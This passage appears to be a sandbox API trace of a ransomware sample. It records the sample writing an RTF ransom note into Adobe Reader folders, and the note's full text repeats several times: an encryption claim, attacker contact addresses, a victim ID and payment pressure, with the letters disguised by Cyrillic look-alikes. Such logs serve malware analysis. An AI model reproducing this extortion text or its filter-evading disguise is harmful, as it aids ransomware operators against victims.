b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.541] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.542] CloseHandle (hObject=0x1fc) returned 1 [0064.542] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hrv\\bg85_info.rtf")) returned 0xffffffff [0064.542] GetLastError () returned 0x2 [0064.542] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hrv\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.543] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions 